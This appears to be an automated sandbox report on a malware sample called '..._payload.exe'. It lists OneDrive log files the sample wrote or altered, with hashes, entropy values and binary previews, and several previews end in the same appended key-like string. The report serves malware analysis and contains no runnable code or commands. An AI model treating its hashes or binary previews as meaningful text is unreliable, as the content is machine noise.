                                                                                                                                                                      Preview:<?xml..p.O.6.../..~.s.M....|.=5..M.[.Hnc[oY....n...6.... ...U.W..K6.p.... .X....DI...?=.2~....$r.15\...V....!..l.k.0I..I.. V%...l>...U.l.$...@.w.k*:.T.Y.v.0.....^.%......;(EjB..V.a..z%.V?'..(E@(]h`ou.....+.y.,.t....].c...z.]rJ.5...Q..~....,>..}m.I....D..k..2..?H.pqT...e.0eS.\.TG.o.\..qej;..f.p.X?yd..Z._.T)q...F4...9W.a.3...._.l.=...kP2......(..:..O]R.E.(.....6...Nqg..xK....j.W4..C......#....._~...#].K..$6...7..O.6..L..?.n0t..N`.v..4%.Th".H0._.F.MT.1.:..)...a&.#5.Z.....U."..G;..S...y;.1..]..(,..2=.?vE.p..Q.....1.......&IM..wX.+.....d....$&.-......i.JpSr7...&..|...&.Xw.......Gw.2.t`}.^..Y-..W..c....`<c9.8.5.?2.J..Cr..|E.8|..Soh.....~~..#..T.e.*2A.......cG...nK^$xu...N>.1E....#..[Y..M3"z..v.8n.jI..{^.q........"q..[AJ.(...e..7.R0..l../S.CBE..Q...='.$U..C..*..b....'G....y}.....G..Rhi..ELkN...ah.m.:..W..!<f.}..x.VQ.........2....zV..`..U~..i.....A.a..k..W......o.V......3....x...a.T..Mk.I*.U.....>j.r.....N.y.MK..Y.~..3....8..4...q....T....N.9..;....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.0953.5356.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.7034785123949394
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:RD/zgaJCMVSDoraiN173R03TQdWXM5b8xAvI2FfAVABoj0GKZn0ww5VvHVPcQwIs:RXjJRVSErapb+f3Ba0GUpwTtEOrmMa
                                                                                                                                                                      MD5:1063C45ACD0EA50E256AEFCDA4318239
                                                                                                                                                                      SHA1:1ABAD64C1D894BF3C395349CE20967BAB55F14F1
                                                                                                                                                                      SHA-256:7B854CDB8437AB8F427977F291D3900689169816C663619D6DD6848805BBD9BB
                                                                                                                                                                      SHA-512:84C1906746896C44640AC386EFABAB1DD12BB1077FA6245DFACAE587FC0D29D9929F66B0CA547DED5AF78D902B87E82096126CB1A50D7F96B0F916BA3B2B35D3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO&..'.d...,..p.S......}'.'.OYH../.....bPxm..>._..i.7n&.Z....G..M.T2`;...z...7......`".H....Uv@... .....BA51>..C..../yCq..\V....}TrS..f...@g.U+...J....S`....7.4.71..N....%bb.C...)..%.B.V..{..O.|.h9.%........!....*..z...2!.@..@...6.*D.A.......j5.......<68 .R.a...#P...:..d4!.y...............BX#...,....X.....?..$.Cp..............J....m..h.....7.T)...UP..PB...M.&m.....ba..DP....+....".0.K.gu.Xc..2K0..g...e.q^S....Y.?...!.v..g........U............<.pq#...........*..@/tY...Y..4X.......D...C.....u.".`c.LK.wx#p...!...."C..^.@..{en23k.5..5)...C..Dz...o.I.c..c.,..)....q....c..C...w..i..c.)8.#.y;*...S........p..f. #.A.I...8.G.C[...D.8_..P.E#qQ..0.......uY....3.E".c.......[.H.C.w....y...JuK.Joz.^..j..*2... o.X.{a..AE....-....g.... .l.avW(...`.-..~R*..........5hu.x.u.....q.B..N..F.iY..Y.{.........Y..Z/-..e..d.... (...).A.%..j...vA<...B.0T..... ,E..../'/..@x...`\*..z.....(.&.....Oj_GK.v....R..pG6[....A[....i.X...zb.V..M\.l..Q..k...i.^..;...".C.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.1052.6292.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.7698499085067214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Z6pV6kV2SDW98xPGhq9skce255VpUFhXmk1MmRdk:86kYSa9Qt5cy/FMmR
                                                                                                                                                                      MD5:71754F21C870A2827C198E4AE715E14C
                                                                                                                                                                      SHA1:1F419EBA16919F6C13A10B16E6AC4B5C952C2307
                                                                                                                                                                      SHA-256:E9DD2B8C9636E950ACE07A03FBF1429253D3C135C925FDE855D05D58994EDB56
                                                                                                                                                                      SHA-512:E584331B899813AF50C9105624183FAEEAA0B3F84539E003F33909F921ABB7B01B8F874F86D2423BD8BCD6E261BAA189691CB776B647BB65EE23FCEFEB654797
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGON......?D'.w.E.k....V>l.}.1..&.>.@.k/=..f..1..l.5...qo.....jM.<....;+@.)..%...`R...V.K.Q.hH..X.....t.m.R#y0..M.S}s......q......a|..............BQ....[..............qK.v....................bSe].Y>....&g=~...@..e.-..m..o. ,..%3<V[.Ym....-vk.r.........o.K.].Z..../[..o.1.......l.a._.;.......b..J..{z...x......f...'...j`.6.B..^N[..GTq[7..!.k....4.rx0::zf.].....C..s.8.j"./.X..\.^. ...-n5.E91)..{..@e....*..?=......TBB$!=.~X\...7.;..b.3.W...0...t.t..O.%q9.A?B...D47:........ec_'.2..*..GF.x.......U..=,..L.w._.>.ij.6G..S.:`..L.|..a.....a.L.AN...A..!.3-4-!.$........'.~..-kL`.I9M.k.".2=.`....CiD.WY....1.....e....1.?;......"G.....J'.v...EQ>.W. ..!...oA..m=3J. o..%....j.g........~..[.]H..R....8....).*...........0zLm....U.SF..O..,4!^.../f.*..c.....e..b.:91.)...>.t...N..=.&H.....a......`...-....._...x.H6..ig...:.U.=....6..E.8/.....)...Y.'..]...w....i~C5A.U\..B...E>.H.6Z..K.To.HFPL7&......{O....4F..(.j.W...j...d3.O..mMUW..x...0...f..xg..O..j

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\telemetry-dll-ramp-value.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):344
                                                                                                                                                                      Entropy (8bit):7.31780327373745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:ir1RqnyK+jkZgm6EWY5jsRa07SqgFj2un7s2o2748XMBHnIS1WdNcii96Z:SRqyR0g1y5jsRa07XC2g7sx3oSUdNciD
                                                                                                                                                                      MD5:E846C4774113BFEF5550455329C0A8CF
                                                                                                                                                                      SHA1:A5EE3585D077E52F71D8B69E6658FCBEE979C31E
                                                                                                                                                                      SHA-256:AA21B054201A953F20C3ED3EF08FEFE365DAEDF3CE363DC692D23081DF1DB6B5
                                                                                                                                                                      SHA-512:2A5894E62116AE5B30A50EE556687EEED4AAED2ED093DA52A35435CDE3F0BDAF8F38DE3FE9D334E5B4D064422C78E9BEB0E96ED38651E6A15DBD6AA605E3259D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2..0,RR...C....&...uz.#)h...E...!..q..K...l...V....`...3...R...$.b..........Zp(`.M>..V........Sc.9...IK.N,.:t.m.>....b...(4...J'..y.>t...%.Xm.../........`.o...Q..`2..w..b......'..;.^....9....F.B.....E.y.H./.g.W|}.%.p:...+......o8.\B..?z ........./...CF.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1149.2948.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.0425952833149033
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:vfTnkym9xYA8YG8rEWJNusq4lIimewuvx5O9GuU7rgOhZEsgI65zk:HgymUR6ERT4lI9ewsjODUvg+mI6
                                                                                                                                                                      MD5:2ED736DA80582044A65A5731C205672B
                                                                                                                                                                      SHA1:86EE7BC26FB463168CDDD35A940229065979EE1E
                                                                                                                                                                      SHA-256:4FEFCEDBDEC024A7A0CA5EBCBF61F39B019F5A820783A22F806B215C8590EDB4
                                                                                                                                                                      SHA-512:238F1879E822BDAFD8F1753C99790D7E12CECB3CA603E02249DDFB593BA44EEF1BCFC9F112B8D3BD51DDA423C09809EF56D2BD0F60DF021DAA8756B04DCF90B0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO........:...x.S.sY......1T.a.PZ)...sk.G|C..|Yg.Ko..g9......k......Vo...V{..u..6j..d.%..(.B.q...........}.[...I.........fs?!.'.q.-..X/p....G0F.Q.1...f.....H..Z...k/.if..u.c.3...."..IfAF.{yJ.h^.V...u.....y".5u{.r...s..Sa2...d.. .z...`.\\.].D..9..bX..>..O.5 .j...<......o..9..Y4...B*R...bJ..D`ee.......z..s.W=...S........'..?ty.X..'a.8..:h...T...].Q~.g.....m....&..F#.,....g.......]=.J...A .a{.3....O.T@....E.t...J.!L..4..lG..O.#....ZO}.Ae3........b..R....Clyq72t....,f....V ...aC...K..G.......q.K5.... C..[.-c7.4.....|...a,......O<.n.j(.c..&.......t..Iif...Lp.rw.^Q.....5..^.j.t...X*..n...A..u..g..$Q ...'.!!..*.3.l.w..Q..%.....C......]s4c..K{=.l..p.G#.o....9.......'yu.$..MM..oe.......1...S.cz..9Y.v....n....dI3...[...Kg:..A&7........`H..)..}....U.>.O.:uz... .o.-U*.58..^.|.}..6ESj.....5nO.H.D.WD..h..;..JVI...R...b.Z,!...E..._..*..I^...~...k........AW8.!.g..,J.....XO.\.4.....[:.....R...tq..\'.@.vB#..!/..B.zO.....4}.]........jh..-...6.d\..p...D.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.2797174956538089
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:xa3jS07xHnsh/oBFKVaLuBMO+gtsEByWdbRE0q:xazS0hnsFo7SZ3tsEByWrbq
                                                                                                                                                                      MD5:3969F2A5188CEA5F9E4F9E7E602950A5
                                                                                                                                                                      SHA1:31427545DD8DD36C8745A4D87FB7FBFAF3FC8AB7
                                                                                                                                                                      SHA-256:DC776E813ADE86A92D9E8E5685FCAE86C0C3711BB49F72BBF9B338F4A6D5D609
                                                                                                                                                                      SHA-512:D8F7F694BBDB79DCE54446ADB5A7676CC4D45584CC07DBA9F89C485BC9E7DF1503C9EBA1B4303B051DE543C4993F28F2838AE84D9D56EC3547742ADB905F52C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO.EQ...C(...U8.H.0..n..;......k.~,cq`.)..-}.R.p.c.7N.|.jz.%95..X`;..t.9....... ...g...m..,.=.....S.kc:|1S...[....p.jq..l-.b...d...O8.........u..eM.....eN.m.6..+?.V...>..`.<....'..$...Iyy....kC.....*?t5...|..DGL..I.!x.(.Jb/^V......].UKv.W.T......y.5.W..p{.X:..}m...T.....3.........1&...A....x.uz6..OC......}.....B..,.::......w|.j..VLs.)....[k..O..d...&{.(L~W.o.k.C.(&Z]......'S.(..[mH.c...!S..[g....w"..a..2i7.[..g.. S..fN.P.Eh:....g{.dq.~U0.bA.v..P0......'.0...R.;....#...*.'.l..(E.p.9b.b..m3.."|8.u.6wJ.>._.[.....y_J.f.gC...#..u.]Z.y;....TGL...e....DhZ.J..d^...+...zv.r.i.\..d}.....k..z..4F.o.s>z....+71..g..b..QK./t...C.......9.*..c.OR.~.m...8&W.......q.5...K..#...@.<.#I.Z7.Z.X...5I.%..........P..@.-G........[CvY...>.<...N@....ZA.u<....b...."}.$........V=...)...I&.6..1...p.R.t..~.....`...}.8(pS..e7..).....t.^...%.&nP.....0]...........E.UH.M.P.@.LH[.Z....J..].....{X..P.B.i...s09o.8.{o).....W0j_w.....W../....Fs\.0..8..3|..9Q2Q9..~.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):2.895578473176353
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:QCRn8uYqhpsOJm5Db3qteFVQHFBLIO/bo9NVvoSXQhMAXZtH:znJhFiqGKlFPbPffH
                                                                                                                                                                      MD5:2FE67750897E9D644F3DE98E7195B8B6
                                                                                                                                                                      SHA1:A1AFD3BB12C9EEE5AFFFF3271E4933B6FA9A16E9
                                                                                                                                                                      SHA-256:C09B725020A2F1B2574ABE5C80437B35F7C85C5AAF3D471CAE50288EB551FE89
                                                                                                                                                                      SHA-512:90598857FC764F00DDEDFC4D22E8F362C8FD6B687AA840F651964BD4A3204883D8D00D90C495293B468A0AD4443BF45A073BC06A4A4813D3B4ACB11E1224459E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGOu~q...-1.....|.O.b...j.B{}6*!$.....x.=.G^...y......R..J.T0.x...8.4...27....s].......D.=.{....fL..]='<..hlFG.y...(."...R......x_..D.$.n.t.Mr\...`....H.S...............R9..u....<.Q.>..n..t..z...._..6...x..U..:.)s..e<.-.$......8.O_i,.<.B...R.q.|.b].^._?..`.D.......0...7.....X.K.O.e...oc.u.Rw.q.C..k........@#....Z8.Q1......F...K.l...<.t...Q.......@...\.Y.....Kub..8..,5.x..X...V~5.... .JJ?X...>..A.....o.D.>......n.~W..A....C.M..K"....jH.E..@....^.G.A{z..1r..1..e....h..P.U.a.0.{hm.x.u.Q.]...Z._.Dr_.,.(.\Jq....s................,M?..~.{.....H.q.zS....nl..g.8...>r.AJV.UT.IK.Z.8...n.....D.F.U.+._+.@A..8E..o5Tw..o.c.O0.+...I..#K. ..8...._.\&...m..,-../s.~6.#..8..@&........,.m|..GI..{.:)z.W_R;...)/A,.cs..).&..P..5l.K........*..R................".g.N^...R.Z).Y...w#...g..[...u.].(.2.D.0A..uh..}...%.....U..N.i..|. o..l.....w...s1J..L..a..O.]..(;s........_:CD..FUj..L..jd-....T..`1_5.....`._8Z..~.X.)..|9I..$V..;.Xc....~.*....9.I3...?...W...+..".r.\'}.\.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.013606037158514
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:67t/iugpa9XEDeBq7LRPkT45aQjHxQ9dhFBPgW6/Hs1jyiP1/l5c6mL:67t6ugpax4r8YtQThduA7Vjc6m
                                                                                                                                                                      MD5:AC75CF457DF6EE3DB466103584090C1B
                                                                                                                                                                      SHA1:3DC8DF3D99DB7042BC1B55A8CED3E89651DD41B2
                                                                                                                                                                      SHA-256:8CE8FF063CCDE8749AE3A32CB78048FDF241C2AB594D8CF8DFB3F394D83A90B3
                                                                                                                                                                      SHA-512:31198B5B7484343A892BFE9BD4DD944B73904A1151B1FAC86BBB309D37341098BBCD46CCC929DE0D812D4239E68ABB47A76719111C49AF7575813B8484B89E12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO..3". p"v...*W:.O.m....,..n..U<.....Q.r`QS......u.;...+..-...........7.#l.`....2......2....V.....4r.c.....c.*7..@.2...k.M.R..i.*.P..x.hV.....0.3.fIz.j..!...>.i.?.~.2.....w.............-}%..qU,..}.T.....Q..7....8.d...2..........C.ug..G.......X...7z.&p...mZ.eM.X..4..+A..q...i|..g.].^5.oY;..$.r..1ky(Ht@...gZ...fs.;.N..-J.n..;..pU..o2.5.."....%.^.f...1..2dI{..!4.....RhA..k.c+.dP......Z...-..7.<U..C.E_<.Oo..%d..:Q.4..C..A....K...(...`m..&.r.~.jt.K....7..../..Jn.7....m......W.8.x...t)..S.T.J...>s...s........`..i.8@.....0^.R.e......-....CizX.9...j9.Y....^.L..E... .N.%....._E~.....EG2a.F.-....CE....4......Z.0.r...u.....[.9 @Pz,....^]...w.eR.`...v......;M..!..S.m.Z,`|.O.r==..h(.......^..D.....n.o...s..c!.L.b..B.....A d;...j..2@.Y....I\^....Ln{..u6~.....r.%t|_.xgf.T.....vK.....V}O....1......[.\q....p 6 .09.KE....~.WW..D.......2.e..N'0.IR.QOR5..8.:...#u...K8....R.oU..#.....T..5.....FC..>N......Z...ET..lst7.v.x?...W.M.3.<:..b..Wg.+.f.,.[..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.2063507530435139
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:/hv1iX28c1g0gW6+65Ss3Cg3ZrMlgIkljaejJtmA+MfnSMiLmkVKk9EEf6MSUdNH:/V1Qb53LprMlnsRCG6MQVKkq32bz
                                                                                                                                                                      MD5:28BE6BD7A2CD8139CCACE08D6EA6D634
                                                                                                                                                                      SHA1:AAB76C8AB50356B7B373207BB181FF66452ABAE2
                                                                                                                                                                      SHA-256:EA206F11BF21717AD563B492C2480E91DB45C5FF5DEAAEC5218F394C76893716
                                                                                                                                                                      SHA-512:85336F25E1D5DDCF20F91F1EBD97C16E699DD4319AF1D7E22ECFEF636E876A74E11F51BA8D9947445BB53CBBE92EE255A71C065BD1B262DF87F08EAE9EC0DF57
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO]u.C0G.J.<0..Yp.v.Z..V..........`.p......2...s..,c*...r91........}T..M.[.w.).~N.7..I._z0s&,..+&h&........3.E...m7...N.p....a.F....hb...:.e.[......VSP.y...3..#5K..iM......b. .a.g3..+.-.x.].Je.R..E......v...U.'d.F.JU.....O.#xH00V/L....Xmh^...L.....O.D..R.o....e..q........4C.k...#.k..Y.)t.V.m|!......._..J......eq.\{E_E..o`.a.=...,..~...H.B....F....).pt.UdT.b`....T.?.:.....G....+.Y.:..(nI#.l.+.W4..mCt..0...@]...|bt.}HV.N]..kS.6....#........y..u.".qn.;9.b\&.c.*}.AZ..@.I2M....Q,..2.kS..4"NB..c...*1.b2..7.......b.^~..W...;.B.x)..."(.....cJ...$Gw.}...g....!p. .C..a. .~.D....&.y.!...;....C.....|m%u..YsZ,..........l^&..g.....t.h...X./...&.>.@.V..MO.cJL3.8K.f.].;...3...{Q.mx..~1Z..1...H..&S....X..|8YF'.4.X.....R..e*.i.......f?..Jt/.........@...._=..nj.e9...A.N.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):4.6906411738130105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:oEKj5ayvVtqnUswBR6jHFM0wePJdtxOBlT877sV2dKenNjJE:od5KULRIHFM0wePTtxOg7LDNe
                                                                                                                                                                      MD5:7C2003C0C8FC4E72AF6EC96D4377EE3A
                                                                                                                                                                      SHA1:13D47D364FC7F7D9B330FF098DCA7129CB26BED4
                                                                                                                                                                      SHA-256:7F4713069F6EEC80DB1D0160A393854A3372B6653FD7307843F9BF3FB70596A5
                                                                                                                                                                      SHA-512:544C7289ACD83FFF181236BE2E4A0A1F6773A1E246B415323C8B715524972C7AD1C74DD87B489F13536075611BB8C516F9B47A7F4D7FA80D00BD8CDEB6F56DCC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO..@...d.XOQR.1......r...o.XrkK..?(\.p..a..K.6l........##.ivO...>.K.*3}...i..%Z*.....}.)..c.....n0E/.R.@^..".......c..U..M.[.R?'j...Wa.]..z...<|.........5.....9.%...Y...O|%..XF....W..V.Z...NS.J...')..LPp!..1p.~/yW.....&8Y._H=.r*...}n.x..x.dMq.....4]}.....Q.nb,..R#)H.~.qsS.?.d..o.</.N.R/....y.B.^.C.E.)8fC~.....Bw.W-..n-.....=.TO......A&0.gBl.T'R..W.:.*..s.[d_..}.x\...@y.!..vK.U.F.`.d.....<..Ce.v?..n....K08...6i..E...Jl...jl6q#5.Z3.....B3.......@...7.M.*..dWj..9.=...8.^l*.9.f|1..p....7m.].5D.....+qEq...1(..`W%q...RH......Sl.x.8../]{...|Q.;.e\.H...zo.1._?DX.m"....&./..g!....e ..).r....Ve4......%.w-..]z.t./......O.!..q..o....NyT2.....c.B.5.C9.UZ...w.u.W.L.RY..i...5...R...H-.h......N.4$ .f..q..1/6..,..B.....!...P?S.H..1..M.....Z3l.HQ|.f..R..\s8..|.00..... t<T_..H......U.$.@.S.D..t..N......3.XBkZ..#..AR.-]...OX..l..Z...........5.uF...~..p....w7q.,...d...(.+H.*!a.]8...9./.l....l....#....:Z........m..qw)Vd.0.L.dj..8.......3.2'.P.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.2706309387955745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:xaGJpVfkbC5fc9t9b9hC7wI+JuGNVIdiYVZ63m72bz:xXkbC5fMphGwfu0V3yyfz
                                                                                                                                                                      MD5:FE7A55B5964B4E6CE4F90DB7FF4F5128
                                                                                                                                                                      SHA1:D1B2F5A2419D511BCAA47E7CB75D267D6FC8E7FA
                                                                                                                                                                      SHA-256:61368045A1C3B957F423D4906A69BC4F558E4B8B3ACB93FAD80DE228E6E4F285
                                                                                                                                                                      SHA-512:622614E12B3D7ABDC6653C79D6862E3728251CF85376EDB6CF0D480766726ECAC6A5D5A678BFF54C60747DD2861A44F79C343660AEF2D1A32399BA8314374408
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO>.I..!.5Y.i.3.-.........)5}.W.G6...6..I..dU......w!2.|..../...l.[.lt..t>.....u.5L....Z{..V./...r...Q...6.3.&-...!..y`+."......L..m...\D..|.3......S.(.S...xR....g.Jl>...2u.....:.tD;uYX:m5}. ...8....N_.b.n.V..K.qI....`[a...8.I..g.e..`FE.g.....g..f.S.+.... ....!.....D9..r.F|..#s.|i.J.v.......w.....P..7..~lS.....v.X.&a.Z.......e...hG.`...G.........SL..\.!..lT...QM.P..6%..._..B1.....%....=..TA:...).BJ0..y.4.8.".f.T...P.A......4..v.n..Z....,.....m)...7....L..yE..Q...vK ...P.{!.......0=H3...._X...|z".C..}.."..C.d.....w...H...`e.%.....0..&..<I.k...v.V...C.p$..s?....U.H._.+.k.s.~.`..B6.T!.W..Bp.&+....-..(..<E....U.I9..q..7..8......4..;,R..N..N`......-..O..K.].....V.V.Hr.T8.&....:...A..0..;/...P..#...X.D..ImOy0@5...'...^.DE=.l.:.2.....H.H..j.Mf.jn..Ck..s-:....g...I}*cm...6....&..f.G.$..!..F....3..[v...L.z...G.E..?2.s..>./.N)y....i.'.#{;QN. &..*Pn?.]...6)..~...0.......g...:....nzq.....`...z..w"(.-<.........H..L.....|X.B..}..U..i6...D..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_114938_158-b2c.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                      Entropy (8bit):7.91038228178019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:vOeUbvO8AZqXjxpym/GB1bYp0HdhdWkyBZgdWHR4BspRQc97+:WXcZIjxp//o0p0HpWkyBekR4Bspy
                                                                                                                                                                      MD5:A59F00026F0187C18916D44C806BEB39
                                                                                                                                                                      SHA1:D84F78F282072DD9D1B4066AEF33467BB23A6F40
                                                                                                                                                                      SHA-256:5A442D88CFA99BEC2F297F7F043FB66F0CD54EFCF0F4A9D3240238752337366E
                                                                                                                                                                      SHA-512:269AAD6DCC3FB55A1436DC1F4EA59C15058FB48248E19AD1577C6832B3D74E088D40AA9D5D809DEA4184D072B963E689236FC55756C9F7A0A50B4CCE2EA21DCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./..[.+..l.H1d\Y........7...e3.kWt....jZ%.?....w..@.3.z.m'3;4_....Bw.q...Z[[._..8..k.k >..2.('.d..b.......eVjF...k.."..^..N .K.Wx..o~.o.....j.$....[vO7..+A.pr.x."..........6.q..g...{...+.b......+.<-.ST.h.~.Y..g.....g._...~.%. ..h..?/..H...I.u..PC9.z..q....../....)'...%.i......#.26O7}.......8mfclX@E.....1@D...... .}.;..`....#.C.W..9Fzq.$..!..1...ct...(@.c..T@..|(j...[U...f..*.}o.Y..*......|..&..c8...C O;hv.J-.t..]a..&.^.{*.........u...?9.62...~er..s..K....w...1.s:0....H.5Lp;.).?....e.B..F.P.:*"....&....3)Q.>. ..i..U....#"W....X...7....]H..... .$....'.........D............5N6G....[,...P...V...u........lhf.i ..C[...&...n%Hj..chI.r...."....'.L.^ [....meSk.r(..=.o.ZAl.kdH.......*f/.AD..R.WZ-.]FN._...K.k.L`.y.*.;...+]i(K..G&f....R....T...|=(d....u(..R......{....;.G.J.cw?#D.&..c}...e|g...&z..xKk.....:;..i....o.......6...Y~....."V|.M_AV.@WV.....4;Y .j...u.Ii.(.!.3..0....=!....rgha.....1..(......}NF.L..t.t/0...,U.B:H.v.]"=..+\3..&.y.^.<...XoAYS.Y.W

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_115005_9064-2616.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):262144
                                                                                                                                                                      Entropy (8bit):6.790582687824715
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:Q9ZL6jpoRP2ooftrXIAi/Zkj4/1rzRLvoT33mbyC52huktN:l47eeZwatSnOEu
                                                                                                                                                                      MD5:CB06D8EB6905519BAA3354628FF9EB69
                                                                                                                                                                      SHA1:AC5D1E916698DE66178DC31CDA9CFFE0AC7A5750
                                                                                                                                                                      SHA-256:29C1448AFA9FF8C36BD604974DCB34F8BFEA8B86FBA48D67C118127E95DC7BA1
                                                                                                                                                                      SHA-512:FE5C267590905E52BCD6ED981124E505A60D4839FA7E275662606573487C0159EBBF4980DBA1C61F83A3153669094332D1412EBDF6310BDDAA0FBB1AE65DCE22
                                                                                                                                                                      Malicious:false
